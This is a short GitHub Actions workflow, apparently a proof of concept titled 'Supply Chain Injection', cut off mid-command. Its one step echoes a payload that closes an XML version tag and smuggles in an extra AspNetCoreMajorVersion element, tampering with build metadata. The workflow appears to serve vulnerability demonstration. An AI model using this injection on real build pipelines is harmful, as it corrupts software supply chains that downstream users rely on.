name: "Exploit PoC: Supply Chain Injection"

on:
  workflow_dispatch:

jobs:
  supply-chain-poisoning:
    runs-on: ubuntu-latest
    steps:
      - name: "Clone Repository"
        uses: actions/checkout@v4

      - name: "Inject Malicious Metadata"
        id: metadata
        run: |
          echo 'payload=1.2.3</SeleniumWebDriverVersion><AspNetCoreMajorVersion>999</AspNetCoreMajorVersion>
